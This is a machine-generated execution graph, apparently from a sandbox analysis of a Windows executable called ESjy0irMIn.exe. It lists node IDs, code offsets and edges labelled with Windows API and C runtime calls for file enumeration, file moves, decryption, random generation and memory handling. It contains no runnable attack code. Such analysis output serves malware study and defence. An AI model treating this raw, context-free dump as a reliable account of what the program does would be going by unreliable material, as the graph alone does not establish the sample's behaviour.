Total number of Limit Nodes: 19
                                                                                                                                                                    execution_graph 15465 29054 15505 2aac0 15465->15505 15467 29060 GetStartupInfoW 15468 29074 HeapSetInformation 15467->15468 15471 2907f 15467->15471 15468->15471 15470 290cd 15472 290d8 15470->15472 15659 29026 15470->15659 15506 2aa99 HeapCreate 15471->15506 15507 2a919 GetModuleHandleW 15472->15507 15475 290de 15476 290e9 __RTC_Initialize 15475->15476 15477 29026 _fast_error_exit 66 API calls 15475->15477 15532 2a299 GetStartupInfoW 15476->15532 15477->15476 15480 29103 GetCommandLineA 15545 2a1fd GetEnvironmentStringsW 15480->15545 15487 29128 15569 29ebd 15487->15569 15488 29aca __amsg_exit 66 API calls 15488->15487 15490 2912e 15491 29139 15490->15491 15492 29aca __amsg_exit 66 API calls 15490->15492 15589 2988b 15491->15589 15492->15491 15494 29141 15495 2914c 15494->15495 15496 29aca __amsg_exit 66 API calls 15494->15496 15595 29e59 15495->15595 15496->15495 15501 2917c 15677 29aa2 15501->15677 15504 29181 _raise 15505->15467 15506->15470 15508 2a936 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15507->15508 15509 2a92d 15507->15509 15511 2a980 TlsAlloc 15508->15511 15680 2a5da 15509->15680 15514 2a9ce TlsSetValue 15511->15514 15515 2aa8f 15511->15515 15514->15515 15516 2a9df 15514->15516 15515->15475 15690 2982a 15516->15690 15521 2aa27 _DecodePointerInternal 15524 2aa3c 15521->15524 15522 2aa8a 15523 2a5da __mtterm 70 API calls 15522->15523 15523->15515 15524->15522 15699 2dc24 15524->15699 15527 2aa5a _DecodePointerInternal 15528 2aa6b 15527->15528 15528->15522 15529 2aa6f 15528->15529 15705 2a61c 15529->15705 15531 2aa77 GetCurrentThreadId 15531->15515 15533 2dc24 __calloc_crt 66 API calls 15532->15533 15543 2a2b7 15533->15543 15534 2a462 GetStdHandle 15539 2a42c 15534->15539 15535 2dc24 __calloc_crt 66 API calls 15535->15543 15536 2a4c6 SetHandleCount 15542 290f7 15536->15542 
15537 2a474 GetFileType 15537->15539 15538 2a3ac 15538->15539 15540 2a3e3 InitializeCriticalSectionAndSpinCount 15538->15540 15541 2a3d8 GetFileType 15538->15541 15539->15534 15539->15536 15539->15537 15544 2a49a InitializeCriticalSectionAndSpinCount 15539->15544 15540->15538 15540->15542 15541->15538 15541->15540 15542->15480 15667 29aca 15542->15667 15543->15535 15543->15538 15543->15539 15543->15542 15543->15543 15544->15539 15544->15542 15546 2a219 WideCharToMultiByte 15545->15546 15550 29113 15545->15550 15548 2a286 FreeEnvironmentStringsW 15546->15548 15549 2a24e 15546->15549 15548->15550 15551 2dbda __malloc_crt 66 API calls 15549->15551 15558 2a13d 15550->15558 15552 2a254 15551->15552 15552->15548 15553 2a25c WideCharToMultiByte 15552->15553 15554 2a27a FreeEnvironmentStringsW 15553->15554 15555 2a26e 15553->15555 15554->15550 15556 2c318 _free 66 API calls 15555->15556 15557 2a276 15556->15557 15557->15554 15559 2a152 15558->15559 15560 2a157 GetModuleFileNameA 15558->15560 15953 2ca40 15559->15953 15562 2a17e 15560->15562 15947 29f9e 15562->15947 15564 2911d 15564->15487 15564->15488 15566 2dbda __malloc_crt 66 API calls 15567 2a1c0 15566->15567 15567->15564 15568 29f9e _parse_cmdline 76 API calls 15567->15568 15568->15564 15570 29ec6 15569->15570 15573 29ecb _strlen 15569->15573 15571 2ca40 ___initmbctable 94 API calls 15570->15571 15571->15573 15572 2dc24 __calloc_crt 66 API calls 15578 29f00 _strlen 15572->15578 15573->15572 15576 29ed9 15573->15576 15574 29f4f 15575 2c318 _free 66 API calls 15574->15575 15575->15576 15576->15490 15577 2dc24 __calloc_crt 66 API calls 15577->15578 15578->15574 15578->15576 15578->15577 15579 29f75 15578->15579 15582 29f8c 15578->15582 16394 2db76 15578->16394 15580 2c318 _free 66 API calls 15579->15580 15580->15576 15583 2afa1 __invoke_watson 10 API calls 15582->15583 15585 29f98 15583->15585 15584 2db59 __wincmdln 76 API calls 15584->15585 15585->15584 15587 2a02a 15585->15587 15586 2a128 15586->15490 15587->15586 
15588 2db59 76 API calls __wincmdln 15587->15588 15588->15587 15590 29899 __IsNonwritableInCurrentImage 15589->15590 16403 2d5c5 15590->16403 15592 298b7 __initterm_e 15594 298d8 __IsNonwritableInCurrentImage 15592->15594 16406 2d5a9 15592->16406 15594->15494 15596 29e67 15595->15596 15597 29e6c 15595->15597 15598 2ca40 ___initmbctable 94 API calls 15596->15598 15599 29152 15597->15599 15600 2db59 __wincmdln 76 API calls 15597->15600 15598->15597 15601 159a6 GetModuleHandleW 15599->15601 15600->15597 16471 16c5c GetCommandLineW CommandLineToArgvW 15601->16471 15603 15abf 15606 15ae3 15603->15606 15656 159fe 15603->15656 16496 18417 15603->16496 16505 160af 15606->16505 15607 15bc5 16646 168fb 15607->16646 15611 159f8 _memset _wcsrchr 15611->15603 15613 2921c __NMSG_WRITE 66 API calls 15611->15613 15611->15656 15617 15a50 PathRemoveExtensionW 15613->15617 15614 15bd4 16661 1a414 15614->16661 15615 15bd9 15624 15be3 15615->15624 16671 16463 15615->16671 16625 2de40 15617->16625 15622 15c07 16715 184c7 GetLocalTime 15622->16715 15624->15622 16682 15cda 15624->16682 15634 15b60 #17 GetTickCount 16535 1621f GetProcessHeap HeapAlloc 15634->16535 15637 184c7 118 API calls 15639 15c39 15637->15639 15640 15c4d 15639->15640 16729 18e6f GetProcessHeap HeapFree 15639->16729 15643 15c6b 15640->15643 15644 15c5d CloseHandle 15640->15644 15641 15b90 GetTickCount 16571 15945 15641->16571 15646 15c7a 15643->15646 15648 18e6f 3 API calls 15643->15648 15644->15643 15649 15c8f 15646->15649 15651 18e6f 3 API calls 15646->15651 15647 15b99 15647->15607 16583 15e0b 15647->16583 15648->15646 15650 15c9e 15649->15650 15652 18e6f 3 API calls 15649->15652 15653 15cad 15650->15653 15655 18e6f 3 API calls 15650->15655 15651->15649 15652->15650 15657 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15653->15657 15655->15653 15656->15607 16638 1854a 15656->16638 15658 15ccf 15657->15658 15658->15501 15674 29a6c 15658->15674 15660 29034 15659->15660 15661 29039 
15659->15661 15662 29ccc __FF_MSGBANNER 66 API calls 15660->15662 15663 29b18 __NMSG_WRITE 66 API calls 15661->15663 15662->15661 15664 29041 15663->15664 15665 297f1 __mtinitlocknum 3 API calls 15664->15665 15666 2904b 15665->15666 15666->15472 15668 29ccc __FF_MSGBANNER 66 API calls 15667->15668 15669 29ad4 15668->15669 15670 29b18 __NMSG_WRITE 66 API calls 15669->15670 15671 29adc 15670->15671 18736 29a87 15671->18736 15675 29927 _doexit 66 API calls 15674->15675 15676 29a7d 15675->15676 15676->15501 15678 29927 _doexit 66 API calls 15677->15678 15679 29aad 15678->15679 15679->15504 15681 2a5e4 _DecodePointerInternal 15680->15681 15682 2a5f3 15680->15682 15681->15682 15683 2a612 15682->15683 15684 2a604 TlsFree 15682->15684 15685 2d0b2 15683->15685 15686 2d09a DeleteCriticalSection 15683->15686 15684->15683 15688 2d0c4 DeleteCriticalSection 15685->15688 15689 2a932 15685->15689 15718 2c318 15686->15718 15688->15685 15689->15475 15744 2a539 _EncodePointerInternal 15690->15744 15692 29832 __init_pointers __initp_misc_winsig 15745 2d019 _EncodePointerInternal 15692->15745 15694 29858 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 15695 2d02f 15694->15695 15696 2d03a 15695->15696 15697 2d044 InitializeCriticalSectionAndSpinCount 15696->15697 15698 2aa23 15696->15698 15697->15696 15697->15698 15698->15521 15698->15522 15700 2dc2d 15699->15700 15702 2aa52 15700->15702 15703 2dc4b Sleep 15700->15703 15746 31603 15700->15746 15702->15522 15702->15527 15704 2dc60 15703->15704 15704->15700 15704->15702 15757 2aac0 15705->15757 15707 2a628 GetModuleHandleW 15758 2d1bd 15707->15758 15709 2a666 InterlockedIncrement 15765 2a6be 15709->15765 15712 2d1bd __lock 64 API calls 15713 2a687 15712->15713 15768 2ca63 InterlockedIncrement 15713->15768 15715 2a6a5 15780 2a6c7 15715->15780 15717 2a6b2 _raise 15717->15531 15719 2c323 HeapFree 15718->15719 15723 2c34c _free 15718->15723 15720 2c338 15719->15720 15719->15723 15724 2b059 
15720->15724 15723->15683 15727 2a6d5 GetLastError 15724->15727 15726 2b05e GetLastError 15726->15723 15741 2a57f TlsGetValue 15727->15741 15730 2a742 SetLastError 15730->15726 15731 2dc24 __calloc_crt 62 API calls 15732 2a700 15731->15732 15732->15730 15733 2a708 _DecodePointerInternal 15732->15733 15734 2a71d 15733->15734 15735 2a721 15734->15735 15736 2a739 15734->15736 15737 2a61c __getptd_noexit 62 API calls 15735->15737 15738 2c318 _free 62 API calls 15736->15738 15740 2a729 GetCurrentThreadId 15737->15740 15739 2a73f 15738->15739 15739->15730 15740->15730 15742 2a594 _DecodePointerInternal TlsSetValue 15741->15742 15743 2a5af 15741->15743 15742->15743 15743->15730 15743->15731 15744->15692 15745->15694 15747 3160f 15746->15747 15754 3162a 15746->15754 15748 3161b 15747->15748 15747->15754 15749 2b059 __fclose_nolock 65 API calls 15748->15749 15751 31620 15749->15751 15750 3163d RtlAllocateHeap 15752 31664 15750->15752 15750->15754 15751->15700 15752->15700 15754->15750 15754->15752 15755 2d44a _DecodePointerInternal 15754->15755 15756 2d45f 15755->15756 15756->15754 15757->15707 15759 2d1d2 15758->15759 15760 2d1e5 EnterCriticalSection 15758->15760 15783 2d0f6 15759->15783 15760->15709 15762 2d1d8 15762->15760 15763 29aca __amsg_exit 65 API calls 15762->15763 15764 2d1e4 15763->15764 15764->15760 15945 2d0da LeaveCriticalSection 15765->15945 15767 2a680 15767->15712 15769 2ca81 InterlockedIncrement 15768->15769 15770 2ca84 15768->15770 15769->15770 15771 2ca91 15770->15771 15772 2ca8e InterlockedIncrement 15770->15772 15773 2ca9b InterlockedIncrement 15771->15773 15774 2ca9e 15771->15774 15772->15771 15773->15774 15775 2caa8 InterlockedIncrement 15774->15775 15777 2caab 15774->15777 15775->15777 15776 2cac4 InterlockedIncrement 15776->15777 15777->15776 15778 2cad4 InterlockedIncrement 15777->15778 15779 2cadf InterlockedIncrement 15777->15779 15778->15777 15779->15715 15946 2d0da LeaveCriticalSection 15780->15946 15782 2a6ce 15782->15717 15784 2d102 _raise 
15783->15784 15785 2d128 15784->15785 15808 29ccc 15784->15808 15793 2d138 _raise 15785->15793 15844 2dbda 15785->15844 15791 2d14a 15796 2b059 __fclose_nolock 65 API calls 15791->15796 15792 2d159 15797 2d1bd __lock 65 API calls 15792->15797 15793->15762 15796->15793 15798 2d160 15797->15798 15799 2d193 15798->15799 15800 2d168 InitializeCriticalSectionAndSpinCount 15798->15800 15801 2c318 _free 65 API calls 15799->15801 15802 2d178 15800->15802 15803 2d184 15800->15803 15801->15803 15804 2c318 _free 65 API calls 15802->15804 15850 2d1af 15803->15850 15805 2d17e 15804->15805 15807 2b059 __fclose_nolock 65 API calls 15805->15807 15807->15803 15853 2dabd 15808->15853 15810 29cd3 15811 2dabd __NMSG_WRITE 66 API calls 15810->15811 15813 29ce0 15810->15813 15811->15813 15812 29b18 __NMSG_WRITE 66 API calls 15814 29cf8 15812->15814 15813->15812 15815 29d02 15813->15815 15816 29b18 __NMSG_WRITE 66 API calls 15814->15816 15817 29b18 15815->15817 15816->15815 15818 29b39 __NMSG_WRITE 15817->15818 15819 2dabd __NMSG_WRITE 63 API calls 15818->15819 15840 29c55 15818->15840 15821 29b53 15819->15821 15823 29c64 GetStdHandle 15821->15823 15824 2dabd __NMSG_WRITE 63 API calls 15821->15824 15822 29cc5 15841 297f1 15822->15841 15827 29c72 _strlen 15823->15827 15823->15840 15825 29b64 15824->15825 15825->15823 15826 29b76 15825->15826 15826->15840 15878 2921c 15826->15878 15830 29ca8 WriteFile 15827->15830 15827->15840 15830->15840 15831 29ba2 GetModuleFileNameW 15832 29bcf _wcslen 15831->15832 15833 29bc3 15831->15833 15834 2afa1 __invoke_watson 10 API calls 15832->15834 15837 2d951 63 API calls __NMSG_WRITE 15832->15837 15838 29c45 15832->15838 15887 2d9cb 15832->15887 15835 2921c __NMSG_WRITE 63 API calls 15833->15835 15834->15832 15835->15832 15837->15832 15896 2d7e0 15838->15896 15914 291d5 15840->15914 15924 297c1 GetModuleHandleW 15841->15924 15846 2dbe3 15844->15846 15847 2d143 15846->15847 15848 2dbfa Sleep 15846->15848 15927 2cdb5 15846->15927 15847->15791 15847->15792 
15849 2dc0f 15848->15849 15849->15846 15849->15847 15944 2d0da LeaveCriticalSection 15850->15944 15852 2d1b6 15852->15793 15854 2dac9 15853->15854 15855 2dad3 15854->15855 15856 2b059 __fclose_nolock 66 API calls 15854->15856 15855->15810 15857 2daec 15856->15857 15860 2affd 15857->15860 15863 2afcb _DecodePointerInternal 15860->15863 15864 2afe0 15863->15864 15869 2afa1 15864->15869 15866 2aff7 15867 2afcb __fclose_nolock 10 API calls 15866->15867 15868 2b009 15867->15868 15868->15810 15872 2ae73 15869->15872 15873 2ae92 _memset __call_reportfault 15872->15873 15874 2aeb0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15873->15874 15875 2af7e __call_reportfault 15874->15875 15876 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15875->15876 15877 2af9a GetCurrentProcess TerminateProcess 15876->15877 15877->15866 15879 29231 15878->15879 15880 2922a 15878->15880 15881 2b059 __fclose_nolock 66 API calls 15879->15881 15880->15879 15885 29252 15880->15885 15882 29236 15881->15882 15883 2affd __fclose_nolock 11 API calls 15882->15883 15884 29240 15883->15884 15884->15831 15884->15832 15885->15884 15886 2b059 __fclose_nolock 66 API calls 15885->15886 15886->15882 15890 2d9dd 15887->15890 15888 2d9e1 15889 2b059 __fclose_nolock 66 API calls 15888->15889 15891 2d9e6 15888->15891 15895 2d9fd 15889->15895 15890->15888 15890->15891 15893 2da24 15890->15893 15891->15832 15892 2affd __fclose_nolock 11 API calls 15892->15891 15893->15891 15894 2b059 __fclose_nolock 66 API calls 15893->15894 15894->15895 15895->15892 15922 2a539 _EncodePointerInternal 15896->15922 15898 2d806 15899 2d893 15898->15899 15900 2d816 LoadLibraryW 15898->15900 15905 2d8ad _DecodePointerInternal _DecodePointerInternal 15899->15905 15912 2d8c0 15899->15912 15901 2d82b GetProcAddress 15900->15901 15906 2d92b 15900->15906 15904 2d841 7 API calls 15901->15904 15901->15906 15902 2d8f6 _DecodePointerInternal 15903 2d91f _DecodePointerInternal 15902->15903 
15908 2d8fd 15902->15908 15903->15906 15904->15899 15909 2d883 GetProcAddress _EncodePointerInternal 15904->15909 15905->15912 15907 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15906->15907 15910 2d94a 15907->15910 15908->15903 15911 2d910 _DecodePointerInternal 15908->15911 15909->15899 15910->15840 15911->15903 15913 2d8e3 15911->15913 15912->15902 15912->15903 15912->15913 15913->15903 15915 291df IsDebuggerPresent 15914->15915 15916 291dd 15914->15916 15923 2de27 15915->15923 15916->15822 15919 2ae21 SetUnhandledExceptionFilter UnhandledExceptionFilter 15920 2ae46 GetCurrentProcess TerminateProcess 15919->15920 15921 2ae3e __call_reportfault 15919->15921 15920->15822 15921->15920 15922->15898 15923->15919 15925 297d5 GetProcAddress 15924->15925 15926 297e5 ExitProcess 15924->15926 15925->15926 15928 2ce32 15927->15928 15935 2cdc3 15927->15935 15929 2d44a _malloc _DecodePointerInternal 15928->15929 15930 2ce38 15929->15930 15931 2b059 __fclose_nolock 65 API calls 15930->15931 15943 2ce2a 15931->15943 15932 29ccc __FF_MSGBANNER 65 API calls 15937 2cdce 15932->15937 15933 2cdf1 RtlAllocateHeap 15933->15935 15933->15943 15934 29b18 __NMSG_WRITE 65 API calls 15934->15937 15935->15933 15936 2ce1e 15935->15936 15935->15937 15938 2d44a _malloc _DecodePointerInternal 15935->15938 15941 2ce1c 15935->15941 15939 2b059 __fclose_nolock 65 API calls 15936->15939 15937->15932 15937->15934 15937->15935 15940 297f1 __mtinitlocknum 3 API calls 15937->15940 15938->15935 15939->15941 15940->15937 15942 2b059 __fclose_nolock 65 API calls 15941->15942 15942->15943 15943->15846 15944->15852 15945->15767 15946->15782 15949 29fbd 15947->15949 15951 2a02a 15949->15951 15957 2db59 15949->15957 15950 2a128 15950->15564 15950->15566 15951->15950 15952 2db59 76 API calls __wincmdln 15951->15952 15952->15951 15954 2ca50 15953->15954 15955 2ca49 15953->15955 15954->15560 16281 2c8a1 15955->16281 15960 2db01 15957->15960 15963 292e9 15960->15963 15964 292fc 
15963->15964 15970 29349 15963->15970 15971 2a753 15964->15971 15967 29329 15967->15970 15991 2c589 15967->15991 15970->15949 15972 2a6d5 __getptd_noexit 66 API calls 15971->15972 15973 2a75b 15972->15973 15974 29301 15973->15974 15975 29aca __amsg_exit 66 API calls 15973->15975 15974->15967 15976 2cd37 15974->15976 15975->15974 15977 2cd43 _raise 15976->15977 15978 2a753 __getptd 66 API calls 15977->15978 15979 2cd48 15978->15979 15980 2cd76 15979->15980 15982 2cd5a 15979->15982 15981 2d1bd __lock 66 API calls 15980->15981 15983 2cd7d 15981->15983 15984 2a753 __getptd 66 API calls 15982->15984 16007 2cce5 15983->16007 15990 2cd5f 15984->15990 15988 29aca __amsg_exit 66 API calls 15989 2cd6d _raise 15988->15989 15989->15967 15990->15988 15990->15989 15992 2c595 _raise 15991->15992 15993 2a753 __getptd 66 API calls 15992->15993 15994 2c59a 15993->15994 15995 2d1bd __lock 66 API calls 15994->15995 15997 2c5ac 15994->15997 15996 2c5ca 15995->15996 15998 2c613 15996->15998 16000 2c5e1 InterlockedDecrement 15996->16000 16001 2c5fb InterlockedIncrement 15996->16001 15999 2c5ba _raise 15997->15999 16003 29aca __amsg_exit 66 API calls 15997->16003 16277 2c624 15998->16277 15999->15970 16000->16001 16004 2c5ec 16000->16004 16001->15998 16003->15999 16004->16001 16005 2c318 _free 66 API calls 16004->16005 16006 2c5fa 16005->16006 16006->16001 16008 2ccf2 16007->16008 16009 2cd27 16007->16009 16008->16009 16010 2ca63 ___addlocaleref 8 API calls 16008->16010 16015 2cda4 16009->16015 16011 2cd08 16010->16011 16011->16009 16018 2caf7 16011->16018 16276 2d0da LeaveCriticalSection 16015->16276 16017 2cdab 16017->15990 16019 2cb8b 16018->16019 16020 2cb08 InterlockedDecrement 16018->16020 16019->16009 16032 2cb95 16019->16032 16021 2cb20 16020->16021 16022 2cb1d InterlockedDecrement 16020->16022 16023 2cb2a InterlockedDecrement 16021->16023 16024 2cb2d 16021->16024 16022->16021 16023->16024 16025 2cb37 InterlockedDecrement 16024->16025 16026 2cb3a 16024->16026 16025->16026 16027 
2cb44 InterlockedDecrement 16026->16027 16029 2cb47 16026->16029 16027->16029 16028 2cb60 InterlockedDecrement 16028->16029 16029->16028 16030 2cb70 InterlockedDecrement 16029->16030 16031 2cb7b InterlockedDecrement 16029->16031 16030->16029 16031->16019 16033 2cc19 16032->16033 16039 2cbac 16032->16039 16034 2cc66 16033->16034 16035 2c318 _free 66 API calls 16033->16035 16047 2cc8f 16034->16047 16102 30ad1 16034->16102 16038 2cc3a 16035->16038 16036 2cbe0 16041 2cc01 16036->16041 16052 2c318 _free 66 API calls 16036->16052 16042 2c318 _free 66 API calls 16038->16042 16039->16033 16039->16036 16045 2c318 _free 66 API calls 16039->16045 16043 2c318 _free 66 API calls 16041->16043 16048 2cc4d 16042->16048 16049 2cc0e 16043->16049 16044 2ccd4 16050 2c318 _free 66 API calls 16044->16050 16051 2cbd5 16045->16051 16046 2c318 _free 66 API calls 16046->16047 16047->16044 16053 2c318 66 API calls _free 16047->16053 16054 2c318 _free 66 API calls 16048->16054 16057 2c318 _free 66 API calls 16049->16057 16058 2ccda 16050->16058 16062 30ebb 16051->16062 16055 2cbf6 16052->16055 16053->16047 16056 2cc5b 16054->16056 16090 30e4d 16055->16090 16061 2c318 _free 66 API calls 16056->16061 16057->16033 16058->16009 16061->16034 16063 30ecc 16062->16063 16089 30fb5 16062->16089 16064 30edd 16063->16064 16065 2c318 _free 66 API calls 16063->16065 16066 30eef 16064->16066 16067 2c318 _free 66 API calls 16064->16067 16065->16064 16068 30f01 16066->16068 16069 2c318 _free 66 API calls 16066->16069 16067->16066 16070 30f13 16068->16070 16072 2c318 _free 66 API calls 16068->16072 16069->16068 16071 30f25 16070->16071 16073 2c318 _free 66 API calls 16070->16073 16074 2c318 _free 66 API calls 16071->16074 16075 30f37 16071->16075 16072->16070 16073->16071 16074->16075 16076 30f49 16075->16076 16077 2c318 _free 66 API calls 16075->16077 16078 30f5b 16076->16078 16080 2c318 _free 66 API calls 16076->16080 16077->16076 16079 30f6d 16078->16079 16081 2c318 _free 66 API calls 16078->16081 16082 
30f7f 16079->16082 16083 2c318 _free 66 API calls 16079->16083 16080->16078 16081->16079 16084 30f91 16082->16084 16085 2c318 _free 66 API calls 16082->16085 16083->16082 16086 30fa3 16084->16086 16087 2c318 _free 66 API calls 16084->16087 16085->16084 16088 2c318 _free 66 API calls 16086->16088 16086->16089 16087->16086 16088->16089 16089->16036 16091 30e5a 16090->16091 16101 30eb2 16090->16101 16092 30e6a 16091->16092 16093 2c318 _free 66 API calls 16091->16093 16094 30e7c 16092->16094 16095 2c318 _free 66 API calls 16092->16095 16093->16092 16096 2c318 _free 66 API calls 16094->16096 16097 30e8e 16094->16097 16095->16094 16096->16097 16098 2c318 _free 66 API calls 16097->16098 16099 30ea0 16097->16099 16098->16099 16100 2c318 _free 66 API calls 16099->16100 16099->16101 16100->16101 16101->16041 16103 30ae2 16102->16103 16104 2cc84 16102->16104 16105 2c318 _free 66 API calls 16103->16105 16104->16046 16106 30aea 16105->16106 16107 2c318 _free 66 API calls 16106->16107 16108 30af2 16107->16108 16109 2c318 _free 66 API calls 16108->16109 16110 30afa 16109->16110 16111 2c318 _free 66 API calls 16110->16111 16112 30b02 16111->16112 16113 2c318 _free 66 API calls 16112->16113 16114 30b0a 16113->16114 16115 2c318 _free 66 API calls 16114->16115 16116 30b12 16115->16116 16117 2c318 _free 66 API calls 16116->16117 16118 30b19 16117->16118 16119 2c318 _free 66 API calls 16118->16119 16120 30b21 16119->16120 16121 2c318 _free 66 API calls 16120->16121 16122 30b29 16121->16122 16123 2c318 _free 66 API calls 16122->16123 16124 30b31 16123->16124 16125 2c318 _free 66 API calls 16124->16125 16126 30b39 16125->16126 16127 2c318 _free 66 API calls 16126->16127 16128 30b41 16127->16128 16129 2c318 _free 66 API calls 16128->16129 16130 30b49 16129->16130 16131 2c318 _free 66 API calls 16130->16131 16132 30b51 16131->16132 16133 2c318 _free 66 API calls 16132->16133 16134 30b59 16133->16134 16135 2c318 _free 66 API calls 16134->16135 16136 30b61 16135->16136 16137 2c318 _free 66 
API calls 16136->16137 16138 30b6c 16137->16138 16139 2c318 _free 66 API calls 16138->16139 16140 30b74 16139->16140 16141 2c318 _free 66 API calls 16140->16141 16142 30b7c 16141->16142 16143 2c318 _free 66 API calls 16142->16143 16144 30b84 16143->16144 16145 2c318 _free 66 API calls 16144->16145 16146 30b8c 16145->16146 16147 2c318 _free 66 API calls 16146->16147 16148 30b94 16147->16148 16149 2c318 _free 66 API calls 16148->16149 16150 30b9c 16149->16150 16151 2c318 _free 66 API calls 16150->16151 16152 30ba4 16151->16152 16276->16017 16280 2d0da LeaveCriticalSection 16277->16280 16279 2c62b 16279->15997 16280->16279 16282 2c8ad _raise 16281->16282 16283 2a753 __getptd 66 API calls 16282->16283 16284 2c8b6 16283->16284 16285 2c589 __setmbcp 68 API calls 16284->16285 16286 2c8c0 16285->16286 16312 2c632 16286->16312 16289 2dbda __malloc_crt 66 API calls 16290 2c8e1 16289->16290 16291 2ca00 _raise 16290->16291 16319 2c6b3 16290->16319 16291->15954 16294 2c911 InterlockedDecrement 16296 2c932 InterlockedIncrement 16294->16296 16297 2c921 16294->16297 16295 2ca0d 16295->16291 16299 2ca20 16295->16299 16302 2c318 _free 66 API calls 16295->16302 16296->16291 16298 2c948 16296->16298 16297->16296 16301 2c318 _free 66 API calls 16297->16301 16298->16291 16304 2d1bd __lock 66 API calls 16298->16304 16300 2b059 __fclose_nolock 66 API calls 16299->16300 16300->16291 16303 2c931 16301->16303 16302->16299 16303->16296 16306 2c95c InterlockedDecrement 16304->16306 16307 2c9eb InterlockedIncrement 16306->16307 16308 2c9d8 16306->16308 16329 2ca02 16307->16329 16308->16307 16310 2c318 _free 66 API calls 16308->16310 16311 2c9ea 16310->16311 16311->16307 16313 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16312->16313 16314 2c646 16313->16314 16315 2c651 GetOEMCP 16314->16315 16316 2c66f 16314->16316 16318 2c661 16315->16318 16317 2c674 GetACP 16316->16317 16316->16318 16317->16318 16318->16289 16318->16291 16320 2c632 getSystemCP 78 API calls 16319->16320 16322 2c6d3 
16320->16322 16321 2c6de setSBCS 16323 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16321->16323 16322->16321 16325 2c722 IsValidCodePage 16322->16325 16328 2c747 _memset __setmbcp_nolock 16322->16328 16324 2c89a 16323->16324 16324->16294 16324->16295 16325->16321 16326 2c734 GetCPInfo 16325->16326 16326->16321 16326->16328 16332 2c3f4 GetCPInfo 16328->16332 16393 2d0da LeaveCriticalSection 16329->16393 16331 2ca09 16331->16291 16335 2c428 _memset 16332->16335 16341 2c4dc 16332->16341 16342 30a8c 16335->16342 16337 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16339 2c582 16337->16339 16339->16328 16340 30955 ___crtLCMapStringA 82 API calls 16340->16341 16341->16337 16343 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16342->16343 16344 30a9f 16343->16344 16352 309a0 16344->16352 16347 30955 16348 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16347->16348 16349 30968 16348->16349 16369 30769 16349->16369 16353 309c9 MultiByteToWideChar 16352->16353 16354 309be 16352->16354 16355 309f2 16353->16355 16357 309f6 16353->16357 16354->16353 16356 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16355->16356 16358 2c497 16356->16358 16360 30a0b _memset __crtGetStringTypeA_stat 16357->16360 16361 2cdb5 _malloc 66 API calls 16357->16361 16358->16347 16359 30a44 MultiByteToWideChar 16362 30a6b 16359->16362 16363 30a5a GetStringTypeW 16359->16363 16360->16355 16360->16359 16361->16360 16365 292c4 16362->16365 16363->16362 16366 292e1 16365->16366 16367 292d0 16365->16367 16366->16355 16367->16366 16368 2c318 _free 66 API calls 16367->16368 16368->16366 16371 30787 MultiByteToWideChar 16369->16371 16372 307e5 16371->16372 16376 307ec 16371->16376 16373 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16372->16373 16375 2c4b7 16373->16375 16374 30839 MultiByteToWideChar 16377 30931 16374->16377 16378 30852 LCMapStringW 16374->16378 16375->16340 16379 2cdb5 
[Execution graph residue: this span of the Joe Sandbox report is the text dump of the sample's rendered execution graph (numeric graph node ids, hex code offsets in ESjy0irMIn.exe and "A->B" edge lists), which does not survive extraction as readable text. Only the API and runtime function names attached to the graph nodes are legible; they are kept here, grouped by what they do.]

C runtime internals: _malloc, _free, __freea, __malloc_crt, __realloc_crt, _memset, _memmove, _raise, __lock, __getptd, __getptd_noexit, __flsbuf, __write, __write_nolock, __close, ___lock_fhandle, __lseeki64_nolock, __vsnwprintf_l, __towlower_l, _wcschr, _wcsnlen, __crtGetStringTypeA_stat, __fclose_nolock, _EncodePointerInternal, _DecodePointerInternal, ___BuildCatchObjectHelper, _LocaleUpdate::_LocaleUpdate, __ehhandler, plus one import by ordinal (#20)
Heap and memory: GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, RtlAllocateHeap, RtlReAllocateHeap, GlobalAlloc, GlobalFree, LocalFree
Strings and locale: LCMapStringW, WideCharToMultiByte, CompareStringW, lstrlenW, CharUpperW, LoadStringW
Files, directories and volumes: CreateFileW, ReadFile, WriteFile, SetFilePointerEx, GetFileAttributesW, CreateDirectoryW, RemoveDirectoryW, MoveFileExW, FindFirstFileW, FindNextFileW, FindClose, FindCloseChangeNotification, GetCurrentDirectoryW, SetCurrentDirectoryW, GetSystemDirectoryW, GetLogicalDriveStringsW, GetDriveTypeW, GetDiskFreeSpaceExW, QueryDosDeviceW, DeviceIoControl, DecryptFileW
Process, module and environment: GetModuleHandleW, GetModuleFileNameW, LoadLibraryW, GetProcAddress, GetCurrentProcess, DuplicateHandle, CloseHandle, CreateThread, CreateEventA, WaitForSingleObject, GetEnvironmentVariableW, SetEnvironmentVariableW, GetComputerNameW, GetLastError, SetErrorMode, GetConsoleMode, Sleep
Version information: GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Time: GetTimeZoneInformation, GetSystemTime, SystemTimeToTzSpecificLocalTime
Synchronization: InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection
Cryptography and identifiers: CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, UuidCreate, UuidToStringW
User interface and window messaging: DialogBoxParamA, DialogBoxParamW, MessageBoxW, SendMessageA, PostMessageW
